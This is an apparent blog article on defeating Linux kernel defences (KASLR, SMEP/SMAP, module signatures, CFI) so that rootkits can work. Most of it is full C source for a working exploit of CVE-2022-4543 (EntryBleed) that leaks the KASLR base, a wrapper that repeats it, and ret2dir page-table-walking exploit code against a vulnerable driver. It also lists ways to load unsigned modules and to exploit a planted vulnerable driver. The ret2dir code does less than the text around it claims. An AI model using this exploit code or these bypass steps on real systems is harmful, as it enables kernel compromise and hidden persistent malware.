lights off & black0ut on
1- Introduction Link to heading
Hello, Welcome!!!
In this article, I will discuss how modern protections in the Linux Kernel hinder and mitigate rootkit functionalities, and of course, how to bypass them.
2- Kernel Address Space Layout Randomization (KASLR) Link to heading
As one of the primary defense mechanisms of the Kernel and other systems, it randomizes the kernel’s memory addresses on each boot, making exploitation more difficult for attackers. For rootkits, this is problematic due to the randomization of the sys_call_table, making syscall hooks harder to implement because of the randomized memory addresses.
To bypass this system, there are several methods, such as:
CVE-2022-4543, also known as EntryBleed, is a vulnerability in the Kernel Page Table Isolation (KPTI) mechanism of Linux, allowing a local attacker to leak the base address of KASLR (Kernel Address Space Layout Randomization) on Intel systems. This flaw exploits a timing-based side channel in the TLB (Translation Lookaside Buffer) to obtain sensitive kernel information, compromising critical memory randomization. This occurs via the entry_SYSCALL_64 mapping, which shares the same address in user and kernel space. By using prefetchnta and prefetcht2 to measure access times to specific addresses, attackers can obtain the syscall address. This vulnerability primarily affects Intel processors. Below is an exploit for this vulnerability:
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
uint64_t sidechannel(uint64_t addr)
{
uint64_t a, b, c, d;
asm volatile(".intel_syntax noprefix;"
"mfence;"
"rdtscp;"
"mov %0, rax;"
"mov %1, rdx;"
"xor rax, rax;"
"lfence;"
"prefetchnta qword ptr [%4];"
"prefetcht2 qword ptr [%4];"
"xor rax, rax;"
"lfence;"
"rdtscp;"
"mov %2, rax;"
"mov %3, rdx;"
"mfence;"
".att_syntax;"
: "=r"(a), "=r"(b), "=r"(c), "=r"(d)
: "r"(addr)
: "rax", "rbx", "rcx", "rdx");
a = (b << 32) | a;
c = (d << 32) | c;
return c - a;
}
#define DUMMY_ITERATIONS 5
#define ITERATIONS 100
uint64_t leak_syscall_entry(unsigned long long offset)
{
unsigned long long STEP = 0x100000ull;
unsigned long long SCAN_START = 0xffffffff80000000ull + offset, SCAN_END = 0xffffffffc0000000ull + offset;
unsigned long long ARR_SIZE = (SCAN_END - SCAN_START) / STEP;
uint64_t *data = (uint64_t *)malloc(sizeof(uint64_t) * ARR_SIZE);
uint64_t min = ~0, addr = ~0;
for (int i = 0; i < ITERATIONS + DUMMY_ITERATIONS; i++)
{
for (uint64_t idx = 0; idx < ARR_SIZE; idx++)
{
uint64_t test = SCAN_START + idx * STEP;
syscall(104);
uint64_t time = sidechannel(test);
if (i >= DUMMY_ITERATIONS)
data[idx] += time;
}
}
for (int i = 0; i < ARR_SIZE; i++)
{
data[i] /= ITERATIONS;
if (data[i] < min)
{
min = data[i];
addr = SCAN_START + i * STEP;
}
}
return addr;
}
int main(int argc, char **argv)
{
if (argc != 2)
{
puts("[*] Usage: ./binary entry_SYSCALL_64_offset(in hex)");
return -1;
}
char *p_end;
unsigned long long entry_SYSCALL_64_offset = strtoull(argv[1], &p_end, 16);
printf("%llx", leak_syscall_entry(entry_SYSCALL_64_offset) - entry_SYSCALL_64_offset);
return 0;
}
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <iostream>
#include <fstream>
#include <string>
#include <map>
using namespace std;
void execute_cmd(const char *cmd, char *result)
{
char buf_ps[1024];
char ps[1024] = {0};
FILE *ptr;
strcpy(ps, cmd);
if ((ptr = popen(ps, "r")) != NULL)
{
while (fgets(buf_ps, 1024, ptr) != NULL)
{
strcat(result, buf_ps);
if (strlen(result) > 1024)
break;
}
pclose(ptr);
ptr = NULL;
}
else
{
printf("popen %s error\n", ps);
}
}
int main(int argc, char **argv)
{
if (argc != 4)
{
puts("[*] Usage: ./binary dekaslr_path entry_SYSCALL_64_offset(in hex) max_loop");
return -1;
}
string dekaslr_path = argv[1];
string koffset = argv[2];
string max_loop = argv[3];
string cmd = dekaslr_path + " " + koffset;
char result[0x1000] = {0};
int max_tries = stoi(max_loop);
map<string, unsigned int> base_record;
for (size_t i = 0; i < max_tries; i++)
{
memset(result, 0, 0x100);
execute_cmd(cmd.c_str(), result);
// printf("%s\n", result);
string key = result;
if (base_record.find(key) != base_record.end())
{
base_record[key]++;
}
else
{
base_record[key] = 1;
}
}
map<string, unsigned int>::iterator iter;
unsigned int max_cnt = 0;
for (iter = base_record.begin(); iter != base_record.end(); iter++)
{
if (iter->second > max_cnt)
{
max_cnt = iter->second;
}
}
string kernel_base;
for (iter = base_record.begin(); iter != base_record.end(); iter++)
{
if (iter->second == max_cnt)
{
kernel_base = iter->first;
cout << "0x" << kernel_base << ": " << max_cnt << "/" << max_tries << endl;
break;
}
}
return 0;
}
3- Supervisor Mode Execution Prevention (SMEP) and Supervisor Mode Access Prevention (SMAP) Link to heading
Another security mechanism based on hardware (CPU) that protects the kernel from attacks attempting to exploit the interaction between privileged (kernel mode) and non-privileged (user mode).
SMEP prevents the kernel from executing code located in userland memory and blocks attacks that attempt to redirect kernel execution to malicious code residing in non-privileged regions via the CR4 register (x86_64): Bit 20 of the CR4 register controls SMEP. If enabled, the CPU generates an exception (General Protection Fault, #GP) if the kernel tries to execute instructions in memory pages marked as “userland” (non-privileged). Page marking: The User/Supervisor bit (bit 2) in the Page Table Entry (PTE) defines whether a page belongs to the user (U=1
) or the kernel (U=0
). This complicates rootkits because it blocks shellcode injection in userland and forces rootkits to use more complex techniques like ROP.
SMAP blocks kernel access to userland memory pages during privileged operations and prevents user-controlled data from being used to corrupt kernel structures or leak sensitive information. How does it work at the low level?
stac
(Set AC Flag): Temporarily allows access to userland (used in functions likecopy_from_user
).clac
(Clear AC Flag): Restores SMAP protection.- AC Flag: When SMAP is active, the CPU checks the AC flag (bit 18 in the RFLAGS register). If
AC=0
, userland accesses are blocked.
For rootkits, this is terrible because it prevents them from using userland data to manipulate the kernel and hinders memory corruption attacks that rely on user-controlled pointers.
One way to bypass these systems is through ret2dir, where the attacker allocates large amounts of memory in userland, forcing the kernel to map these pages into the physmap. Since the physmap is shared between userland and kernel, attacker-controlled data can reside at known kernel addresses. The attacker allocates multiple pages in userland via mmap
and fills them with malicious code (shellcode). This is useful because SMAP and SMEP do not block execution in the physmap. Below is an example code for this purpose:
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/fcntl.h>
#include <sys/mman.h>
#include <sys/stat.h>
#define VULN_READ 0x1111
#define VULN_WRITE 0x2222
#define VULN_STACK 0x3333
#define VULN_PGD 0x4444
struct rwRequest {
void *kaddr;
void *uaddr;
size_t length;
};
unsigned long pageOffsetBase = 0xffff888000000000;
int Open(char *fname, int mode) {
int fd;
if ((fd = open(fname, mode)) < 0) {
perror("open");
exit(-1);
}
return fd;
}
void write64(unsigned long kaddr, unsigned long value) {
struct rwRequest req;
unsigned long value_ = value;
req.uaddr = &value_;
req.length = 8;
req.kaddr = (void *)kaddr;
int fd = Open("/dev/vuln", O_RDONLY);
if (ioctl(fd, VULN_WRITE, &req) < 0) {
perror("ioctl");
exit(-1);
}
}
unsigned long read64(unsigned long kaddr) {
struct rwRequest req;
unsigned long value;;
req.uaddr = &value;
req.length = 8;
req.kaddr = (void *)kaddr;
int fd = Open("/dev/vuln", O_RDONLY);
if (ioctl(fd, VULN_READ, &req) < 0) {
perror("ioctl");
exit(-1);
}
return value;
}
unsigned long leak_stack() {
struct rwRequest req;
unsigned long stack;
int fd = Open("/dev/vuln", O_RDONLY);
req.uaddr = &stack;
if (ioctl(fd, VULN_STACK, &req) < 0) {
perror("ioctl");
exit(-1);
}
return stack;
}
unsigned long leak_pgd() {
struct rwRequest req;
unsigned long pgd = 0xcccccccc;
int fd = Open("/dev/vuln", O_RDONLY);
req.uaddr = &pgd;
if (ioctl(fd, VULN_PGD, &req) < 0) {
perror("ioctl");
exit(-1);
}
return pgd;
}
unsigned long find_synonym(unsigned long pgdir, unsigned long vaddr) {
unsigned long index1 = (vaddr >> 39) & 0x1ff;
unsigned long index2 = (vaddr >> 30) & 0x1ff;
unsigned long index3 = (vaddr >> 21) & 0x1ff;
unsigned long index4 = (vaddr >> 12) & 0x1ff;
printf("index1: %lx, index2: %lx, index3: %lx index4: %lx\n", index1, index2, index3, index4);
unsigned long lv1 = read64(pgdir + index1*8);
if (!lv1) {
printf("[!] lv1 is invalid\n");
exit(-1);
}
printf("lv1: %lx\n", lv1);
unsigned long lv2 = read64((((lv1 >> 12) & 0x3fffffff) << 12) + pageOffsetBase + index2*8);
if (!lv2) {
printf("[!] lv2 is invalid\n");
exit(-1);
}
printf("lv2: %lx\n", lv2);
unsigned long lv3 = read64((((lv2 >> 12) & 0x3fffffff) << 12) + pageOffsetBase + index3*8);
if (!lv3) {
printf("[!] lv3 is invalid\n");
exit(-1);
}
printf("lv3: %lx\n", lv3);
unsigned long lv4 = read64((((lv3 >> 12) & 0x3fffffff) << 12) + pageOffsetBase + index4*8);
if (!lv4) {
printf("[!] lv3 is invalid\n");
exit(-1);
}
printf("lv4: %lx\n", lv4);
unsigned long vaddr_alias = (((lv4 >> 12) & 0x3fffffff) << 12) + pageOffsetBase;
return vaddr_alias;
}
unsigned long pageTableWalk(unsigned long pgdir, unsigned long vaddr) {
unsigned long index1 = (vaddr >> 39) & 0x1ff;
unsigned long index2 = (vaddr >> 30) & 0x1ff;
unsigned long index3 = (vaddr >> 21) & 0x1ff;
unsigned long index4 = (vaddr >> 12) & 0x1ff;
printf("index1: %lx, index2: %lx, index3: %lx index4: %lx\n", index1, index2, index3, index4);
unsigned long lv1 = read64(pgdir + index1*8);
if (!lv1) {
printf("[!] lv1 is invalid\n");
exit(-1);
}
printf("lv1: %lx\n", lv1);
unsigned long lv2 = read64((((lv1 >> 12) & 0x3fffffff) << 12) + pageOffsetBase + index2*8);
if (!lv2) {
printf("[!] lv2 is invalid\n");
exit(-1);
}
printf("lv2: %lx\n", lv2);
unsigned long lv3 = read64((((lv2 >> 12) & 0x3fffffff) << 12) + pageOffsetBase + index3*8);
if (!lv3) {
printf("[!] lv3 is invalid\n");
exit(-1);
}
printf("lv3: %lx\n", lv3);
unsigned long lv4 = read64((((lv3 >> 12) & 0x3fffffff) << 12) + pageOffsetBase + index4*8);
if (!lv4) {
printf("[!] lv3 is invalid\n");
exit(-1);
}
printf("lv4: %lx\n", lv4);
unsigned long vaddr_alias = (((lv4 >> 12) & 0x3fffffff) << 12) + pageOffsetBase;
printf("vaddr alias page: %p\n", (void *)vaddr_alias);
unsigned long pte_addr = (((lv3 >> 12) & 0x3fffffff) << 12) + pageOffsetBase + index4*8;
printf("pte address: %p\n", (void *)pte_addr);
return pte_addr;
}
int main (int argc, char **argv){
void *rwx = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
if (rwx == MAP_FAILED) {
perror("mmap");
exit(-1);
}
void *rw = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
if (rw == MAP_FAILED) {
perror("mmap");
exit(-1);
}
memset(rwx, 0xcc, 0x1000);
memset(rw, 0xcc, 0x1000);
unsigned long pgd = leak_pgd();
printf("[*] page directory is at: %p\n", (void *)pgd);
unsigned long rwx_pte = pageTableWalk(pgd, find_synonym(pgd,rwx));
unsigned long rw_pte = pageTableWalk(pgd, find_synonym(pgd,rw));
printf("[*] RWX: %lx\n", read64(rwx_pte));
printf("[*] RW : %lx\n", read64(rw_pte));
return 0;
}
4- Kernel Module Signatures Link to heading
The Kernel Module Signature (with SHA-512 as the default) is a security mechanism built into Linux that ensures only kernel modules (.ko
files) digitally signed by a trusted key can be loaded. This feature is essential to prevent the injection of malicious code (such as rootkits) or unauthorized modules into the kernel, especially on systems with Secure Boot enabled.
Bypass methods include:
Secure Boot Disabled: Unsigned modules can be loaded via insmod --force
.
Custom Keys: Systems can use local keys, but this requires recompiling the kernel.
Installing a driver with vulnerabilities that can be exploited, essentially installing a security flaw on the machine (e.g., CVE-2021-3490).
5- Control Flow Integrity (CFI) Link to heading
Control Flow Integrity (CFI) is a security mechanism designed to protect programs and systems from exploits that derail the legitimate execution flow, such as Return-Oriented Programming (ROP) and Jump-Oriented Programming (JOP). It ensures that control flow (function calls, returns, jumps) follows only predefined valid paths, thus preventing attackers from hijacking execution for malicious code. The following techniques exist to bypass this system:
-
A. Attacks on “Coarse-Grained” Implementations
Problem: Coarse-grained CFI groups many valid destinations into broad categories.
Example: If all functions returningint
are considered valid, an attacker can redirect execution to any of them.
Affected Tools: Older versions of Clang CFI and Microsoft CFG. -
B. Memory Corruption Primitive + CFI Weakening
Mechanism: Combining memory corruption (e.g., buffer overflow) with flaws in CFI.
Example: Corrupting a data structure (e.g.,struct file_operations
) to redirect flow to gadgets permitted by CFI.
Case: WarpAttack used double-fetches (double memory accesses) to create race conditions and bypass checks. -
C. ROP/JOP Within Allowed Boundaries
Mechanism: Constructing ROP/JOP chains using only gadgets in regions marked as valid by CFI.
Example: Counterfeit Object-Oriented Programming (COOP) uses legitimate object calls to achieve malicious goals. -
D. Abuse of APIs or Legitimate Functions
Mechanism: Calling valid system functions with manipulated arguments.
Example: Usingsystem()
orexecve()
with attacker-controlled parameters.
This allows for a more sophisticated and robust rootkit.
6- Conclusion Link to heading
In conclusion, kernel hacking is an extremely vast field, with an ongoing war between increasingly sophisticated defenses and attackers. The content presented here covers some techniques to bypass Linux Kernel defenses, but there are countless other methods. That’s it—thank you very much!
lights on & black0ut out